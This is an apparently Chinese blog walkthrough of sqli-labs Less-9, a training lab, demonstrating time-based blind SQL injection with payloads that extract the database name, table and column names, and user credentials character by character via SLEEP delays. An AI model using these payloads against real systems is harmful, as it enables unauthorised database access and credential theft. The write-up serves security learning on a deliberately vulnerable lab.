sqli-labs Less-9

Less-9 Get - Blind -Time based -Single Quotes

原页面
在这里插入图片描述
基于时间的盲注
如果是正确的直接返回,错误的时候等待5秒钟。

1.猜测数据库:
?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+
在这里插入图片描述
?id=1’ and If(ascii(substr(database(),1,1))=114,1,sleep(5))–+在这里插入图片描述
说明第一位是s (ascii码是115)

?id=1’and If(ascii(substr(database(),2,1))=101,1,sleep(5))–+在这里插入图片描述
说明第二位是e (ascii码是101)
… 以此类推,得到数据库名字是security

2.猜测security数据库的数据表:
?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101,1,sleep(5))–+在这里插入图片描述

?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=100,1,sleep(5))–+在这里插入图片描述说明第一个数据表的第一位是e,…依次类推,得到emails

?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 1,1),1,1))=114,1,sleep(5))–+
(判断步骤同上)
多次尝试后得到所有的数据表emails,referers,uagents,users

3.猜测users表的列:
?id=1’and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))=105,1,sleep(5))–+
(判断步骤同上)
多次尝试,到列名是id,username,password

4.猜测username的值:
?id=1’and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))–+
(判断步骤同上)
多次尝试 得到所有的用户名和密码

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值